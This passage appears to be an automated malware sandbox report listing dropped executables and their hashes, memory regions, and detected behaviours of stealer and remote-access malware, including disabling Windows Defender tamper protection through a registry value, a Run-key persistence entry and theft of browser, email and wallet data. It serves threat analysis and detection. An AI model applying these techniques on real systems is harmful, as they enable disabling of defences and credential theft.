| MD5 | 8f73c08a9660691143661bf7332c3c27 |
| SHA1 | 37fa65dd737c50fda710fdbde89e51374d0c204a |
| SHA256 | 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd |
| SHA512 | 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89 |
\ProgramData\msvcp140.dll
| MD5 | 109f0f02fd37c84bfc7508d4227d7ed5 |
| SHA1 | ef7420141bb15ac334d3964082361a460bfdb975 |
| SHA256 | 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4 |
| SHA512 | 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39 |
\ProgramData\vcruntime140.dll
| MD5 | 7587bf9cb4147022cd5681b015183046 |
| SHA1 | f2106306a8f6f0da5afb7fc765cfa0757ad5a628 |
| SHA256 | c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d |
| SHA512 | 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f |
\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe
| MD5 | abeb86fdec0060ffb80f364cabd30b1b |
| SHA1 | 3c9c7b3ee66ff071eb32848ad5a62fab9683427c |
| SHA256 | 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b |
| SHA512 | c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4 |
memory/1176-112-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe
| MD5 | abeb86fdec0060ffb80f364cabd30b1b |
| SHA1 | 3c9c7b3ee66ff071eb32848ad5a62fab9683427c |
| SHA256 | 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b |
| SHA512 | c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4 |
C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe
| MD5 | abeb86fdec0060ffb80f364cabd30b1b |
| SHA1 | 3c9c7b3ee66ff071eb32848ad5a62fab9683427c |
| SHA256 | 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b |
| SHA512 | c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4 |
\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe
| MD5 | 457e1bf09958f400b72e470e672dad6b |
| SHA1 | 15e2efa61dc81321614dfb32b45901b938f001d1 |
| SHA256 | d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee |
| SHA512 | 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7 |
memory/1700-117-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe
| MD5 | 457e1bf09958f400b72e470e672dad6b |
| SHA1 | 15e2efa61dc81321614dfb32b45901b938f001d1 |
| SHA256 | d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee |
| SHA512 | 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7 |
C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe
| MD5 | 457e1bf09958f400b72e470e672dad6b |
| SHA1 | 15e2efa61dc81321614dfb32b45901b938f001d1 |
| SHA256 | d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee |
| SHA512 | 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7 |
\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe
| MD5 | df5e3ee9a6098d1e29b31603672d5a8f |
| SHA1 | 0af2378effff0a7451317874efe4e6682365c03e |
| SHA256 | fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2 |
| SHA512 | 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9 |
memory/2000-120-0x0000000000000000-mapping.dmp
memory/1784-121-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe
| MD5 | df5e3ee9a6098d1e29b31603672d5a8f |
| SHA1 | 0af2378effff0a7451317874efe4e6682365c03e |
| SHA256 | fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2 |
| SHA512 | 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9 |
C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe
| MD5 | df5e3ee9a6098d1e29b31603672d5a8f |
| SHA1 | 0af2378effff0a7451317874efe4e6682365c03e |
| SHA256 | fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2 |
| SHA512 | 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9 |
memory/860-124-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe
| MD5 | 6439889cfd410e3b57422781c93e26cf |
| SHA1 | 12280091094281fa60fa8321006abfc7c4bd4e33 |
| SHA256 | c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d |
| SHA512 | 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e |
memory/564-126-0x0000000000000000-mapping.dmp
memory/1176-127-0x0000000000910000-0x0000000000911000-memory.dmp
memory/2000-128-0x0000000000B80000-0x0000000000B81000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe
| MD5 | 6439889cfd410e3b57422781c93e26cf |
| SHA1 | 12280091094281fa60fa8321006abfc7c4bd4e33 |
| SHA256 | c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d |
| SHA512 | 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e |
C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe
| MD5 | 6439889cfd410e3b57422781c93e26cf |
| SHA1 | 12280091094281fa60fa8321006abfc7c4bd4e33 |
| SHA256 | c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d |
| SHA512 | 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e |
memory/564-133-0x00000000001C0000-0x00000000001C1000-memory.dmp
\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA1 | f2953a9ba829d6fd1e0955dbc95e55abd08234e1 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
| SHA512 | 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d |
C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA1 | f2953a9ba829d6fd1e0955dbc95e55abd08234e1 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
| SHA512 | 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d |
memory/1480-137-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA1 | f2953a9ba829d6fd1e0955dbc95e55abd08234e1 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
| SHA512 | 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d |
memory/1620-138-0x0000000000000000-mapping.dmp
memory/948-140-0x0000000000000000-mapping.dmp
memory/1700-141-0x0000000000220000-0x0000000000221000-memory.dmp
memory/1480-142-0x0000000000220000-0x0000000000221000-memory.dmp
memory/1176-145-0x0000000002090000-0x00000000020F6000-memory.dmp
memory/564-143-0x0000000001E20000-0x0000000001E80000-memory.dmp
memory/2000-144-0x00000000005F0000-0x0000000000650000-memory.dmp
memory/1176-147-0x0000000000890000-0x0000000000891000-memory.dmp
memory/564-146-0x0000000000670000-0x0000000000671000-memory.dmp
memory/2000-148-0x0000000004980000-0x0000000004981000-memory.dmp
memory/2000-149-0x00000000004E0000-0x00000000004E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\KPJhVJcxrh.exe
| MD5 | 457e1bf09958f400b72e470e672dad6b |
| SHA1 | 15e2efa61dc81321614dfb32b45901b938f001d1 |
| SHA256 | d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee |
| SHA512 | 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7 |
C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA1 | f2953a9ba829d6fd1e0955dbc95e55abd08234e1 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
| SHA512 | 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
| MD5 | 3eff1d28a83d7c01ebbd6fdbeeb51b9b |
| SHA1 | 4f34a875b74b9b002ab25fb2a95a18ce94fbb783 |
| SHA256 | 668692f2c0638542a373e6622e97ab2e356a18d3b500a2bc82da133de1b7ac43 |
| SHA512 | 1c64b1895f0d8aaec135e36f99ff95c63193230dd2a361513c6b1a9964630455ebe6c7504e8eb172f83784d6617b5bd5b06ea9d3f898ec2684b996c167710505 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
| MD5 | 74027813e8cfccc5e9c4dd335fe2eb8c |
| SHA1 | 440cc9a282a9fde743ab238329ea703ec4b0e31a |
| SHA256 | 9ee3ab8572c1745a3210f6517a5cd01e7e96591efe181d10119cf2c3df818c52 |
| SHA512 | 8337a406694f547fcbd92118587dd1a57db86eceef9cb88ab4f4eaa15f361a43f57695f19793a27540426ede3bf58f479f5e4bbb1bbb91395390a7328847ce13 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6adf28c5f1ad2f7ee305c5467c2023df |
| SHA1 | d141738df05f1d0678cd3c443810a4b80f8ff114 |
| SHA256 | 32b94ce0d4addc5b056e30eda5e6861d71f4d60c76af75d963316ce16fe57d74 |
| SHA512 | 5cdf89f3e884178045bd34fb04cddf3433dfab351473c5aed9a303ec49f7a143d3249e2e048ae459a58485571982cf99a9c6367d1c77d7a58b1620f31eeeb8e0 |
memory/1688-160-0x0000000000400000-0x0000000000405000-memory.dmp
memory/1688-161-0x0000000000400000-0x0000000000405000-memory.dmp
\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA1 | f2953a9ba829d6fd1e0955dbc95e55abd08234e1 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
| SHA512 | 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d |
memory/1712-162-0x0000000000000000-mapping.dmp
memory/1688-163-0x0000000000400000-0x0000000000405000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CZUEwkHDGE.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA1 | f2953a9ba829d6fd1e0955dbc95e55abd08234e1 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
| SHA512 | 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d |
memory/1688-169-0x0000000000400000-0x0000000000405000-memory.dmp
memory/1848-168-0x0000000000000000-mapping.dmp
memory/1688-165-0x00000000004019E4-mapping.dmp
memory/688-170-0x0000000000000000-mapping.dmp
C:\Users\Public\Trast.bat
| MD5 | 4068c9f69fcd8a171c67f81d4a952a54 |
| SHA1 | 4d2536a8c28cdcc17465e20d6693fb9e8e713b36 |
| SHA256 | 24222300c78180b50ed1f8361ba63cb27316ec994c1c9079708a51b4a1a9d810 |
| SHA512 | a64f9319acc51fffd0491c74dcd9c9084c2783b82f95727e4bfe387a8528c6dcf68f11418e88f1e133d115daf907549c86dd7ad866b2a7938add5225fbb2811d |
memory/1380-172-0x0000000000000000-mapping.dmp
C:\Users\Public\UKO.bat
| MD5 | eaf8d967454c3bbddbf2e05a421411f8 |
| SHA1 | 6170880409b24de75c2dc3d56a506fbff7f6622c |
| SHA256 | f35f2658455a2e40f151549a7d6465a836c33fa9109e67623916f889849eac56 |
| SHA512 | fe5be5c673e99f70c93019d01abb0a29dd2ecf25b2d895190ff551f020c28e7d8f99f65007f440f0f76c5bcac343b2a179a94d190c938ea3b9e1197890a412e9 |
memory/1460-175-0x0000000000000000-mapping.dmp
memory/1396-176-0x0000000000000000-mapping.dmp
memory/1924-177-0x0000000000000000-mapping.dmp
memory/1712-179-0x0000000000100000-0x0000000000101000-memory.dmp
memory/1712-181-0x0000000010580000-0x00000000105F3000-memory.dmp
memory/1712-180-0x00000000001B0000-0x00000000001B1000-memory.dmp
memory/1712-178-0x0000000000080000-0x0000000000081000-memory.dmp
memory/1712-182-0x0000000000400000-0x0000000000470000-memory.dmp
memory/1912-183-0x0000000000000000-mapping.dmp
C:\Users\Public\nest.bat
| MD5 | 8ada51400b7915de2124baaf75e3414c |
| SHA1 | 1a7b9db12184ab7fd7fce1c383f9670a00adb081 |
| SHA256 | 45aa3957c29865260a78f03eef18ae9aebdbf7bea751ecc88be4a799f2bb46c7 |
| SHA512 | 9afc138157a4565294ca49942579cdb6f5d8084e56f9354738de62b585f4c0fa3e7f2cbc9541827f2084e3ff36c46eed29b46f5dd2444062ffcd05c599992e68 |
memory/1848-185-0x0000000000000000-mapping.dmp
memory/564-188-0x0000000004C30000-0x0000000004CA2000-memory.dmp
memory/1176-187-0x0000000001FC0000-0x0000000002037000-memory.dmp
memory/2000-186-0x00000000048A0000-0x0000000004912000-memory.dmp
memory/2000-189-0x0000000000B60000-0x0000000000B80000-memory.dmp
memory/1176-190-0x0000000004840000-0x0000000004866000-memory.dmp
memory/564-191-0x00000000020B0000-0x00000000020CF000-memory.dmp
\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe
| MD5 | df5e3ee9a6098d1e29b31603672d5a8f |
| SHA1 | 0af2378effff0a7451317874efe4e6682365c03e |
| SHA256 | fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2 |
| SHA512 | 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9 |
\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe
| MD5 | 6439889cfd410e3b57422781c93e26cf |
| SHA1 | 12280091094281fa60fa8321006abfc7c4bd4e33 |
| SHA256 | c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d |
| SHA512 | 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e |
memory/956-195-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1844-197-0x000000000040616E-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\d0VTgBMZj5.exe
| MD5 | 6439889cfd410e3b57422781c93e26cf |
| SHA1 | 12280091094281fa60fa8321006abfc7c4bd4e33 |
| SHA256 | c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d |
| SHA512 | 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e |
memory/956-196-0x0000000000403BEE-mapping.dmp
memory/1844-193-0x0000000000400000-0x000000000040C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1PDBQ9TOLW.exe
| MD5 | df5e3ee9a6098d1e29b31603672d5a8f |
| SHA1 | 0af2378effff0a7451317874efe4e6682365c03e |
| SHA256 | fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2 |
| SHA512 | 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9 |
memory/956-200-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1844-202-0x0000000000400000-0x000000000040C000-memory.dmp
memory/860-204-0x0000000000000000-mapping.dmp
memory/1368-205-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\tmp3A90.tmp
| MD5 | 21e61c6e6362bf22646b4c88071f6b5f |
| SHA1 | eef3aef98ce21d17c7cae27f0bce63f098b37f1b |
| SHA256 | 18c0e6c54a05a9ef9889201b1cb07a35af8bf6251486ca0b163205f6048cf2d7 |
| SHA512 | 43bd654ddc31b28de00978a3086594c1e7e93dbfbe3b54763972cfe9eccf30c2ab4bbfd3dd59f77bf8de0765e85bc20a1625d8b49b9d688f845b2b387dd90632 |
memory/1460-209-0x0000000000000000-mapping.dmp
memory/1844-212-0x0000000000450000-0x0000000000451000-memory.dmp
C:\Windows\temp\udz2b2rb.inf
| MD5 | 994f81fd890986436aac86037ed80fa7 |
| SHA1 | 59945339f09682445ba9a57f86fdc94d13c0a337 |
| SHA256 | 27141842f4689f5d32e01800ae117d8d93b49ffabe21acbb1fa7c2298c547eb0 |
| SHA512 | 70a7c61af50ac31e1c6068d278f3697a2be84f09b3384418d6d717ab45ecab4d726564a067856f2528f94c5c1ce2a6634ccd8c0cc76c1dc6fd8ffbf0c4c21096 |
memory/860-215-0x0000000004980000-0x0000000004981000-memory.dmp
memory/2032-217-0x0000000000400000-0x0000000000412000-memory.dmp
memory/1844-216-0x0000000000455000-0x0000000000466000-memory.dmp
\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe
| MD5 | abeb86fdec0060ffb80f364cabd30b1b |
| SHA1 | 3c9c7b3ee66ff071eb32848ad5a62fab9683427c |
| SHA256 | 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b |
| SHA512 | c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4 |
memory/2032-218-0x000000000040C71E-mapping.dmp
memory/860-211-0x0000000000A80000-0x0000000000A81000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\o8jf0FpyIL.exe
| MD5 | abeb86fdec0060ffb80f364cabd30b1b |
| SHA1 | 3c9c7b3ee66ff071eb32848ad5a62fab9683427c |
| SHA256 | 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b |
| SHA512 | c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4 |
memory/2032-221-0x0000000000400000-0x0000000000412000-memory.dmp
memory/860-220-0x00000000049C0000-0x00000000049C1000-memory.dmp
memory/860-223-0x0000000002540000-0x0000000002541000-memory.dmp
memory/860-224-0x0000000004982000-0x0000000004983000-memory.dmp
memory/1844-225-0x0000000000466000-0x0000000000467000-memory.dmp
memory/860-226-0x0000000004770000-0x0000000004771000-memory.dmp
memory/860-229-0x0000000005630000-0x0000000005631000-memory.dmp
memory/860-234-0x00000000060A0000-0x00000000060A1000-memory.dmp
memory/860-235-0x00000000062B0000-0x00000000062B1000-memory.dmp
memory/860-259-0x000000007EF30000-0x000000007EF31000-memory.dmp
memory/2032-261-0x00000000020C0000-0x00000000020C1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA1 | f2953a9ba829d6fd1e0955dbc95e55abd08234e1 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
| SHA512 | 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d |
memory/988-263-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA1 | f2953a9ba829d6fd1e0955dbc95e55abd08234e1 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
| SHA512 | 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d |
memory/988-265-0x0000000000220000-0x0000000000221000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RNQMQDEL\Bdojytwvbcgagbvmwkdspythmuhhgvq[1]
| MD5 | 0381b7281382fd974fa960f89f893d92 |
| SHA1 | e49a5832692ef9bda4bf8a7e55765b154e37bc12 |
| SHA256 | 0dc7f9eef6ad651077ea0f77b2963d5fecb0f1cdc8f229a207e3b94c42b33d37 |
| SHA512 | 41a35220bd15777177fde4031021341fa140cd6f92fb0a549eabcd7286d7d507d4121d6fdebe5db57faa0eef475d56a998e1c529cc0cc0a6f3c59d2a328039c6 |
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA1 | f2953a9ba829d6fd1e0955dbc95e55abd08234e1 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
| SHA512 | 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d |
memory/1572-272-0x00000000004019E4-mapping.dmp
memory/464-276-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA1 | f2953a9ba829d6fd1e0955dbc95e55abd08234e1 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
| SHA512 | 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d |
memory/1008-277-0x0000000000000000-mapping.dmp
memory/1008-279-0x00000000001C0000-0x00000000001C1000-memory.dmp
memory/1620-285-0x00000000004019E4-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2021-08-13 11:33
Reported
2021-08-13 11:36
Platform
win10v20210408
Max time kernel
119s
Max time network
159s
Command Line
Signatures
AsyncRat
Azorult
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
Oski
Raccoon
Raccoon Stealer Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Remcos
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\GFDyrtucbvfdg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
| N/A | N/A | C:\ProgramData\GFDyrtucbvfdg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe | N/A |
| N/A | N/A | C:\Windows\temp\h3gk1fsv.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Jjdsdpr = "C:\\Users\\Public\\Libraries\\rpdsdjJ.url" | C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe | N/A |
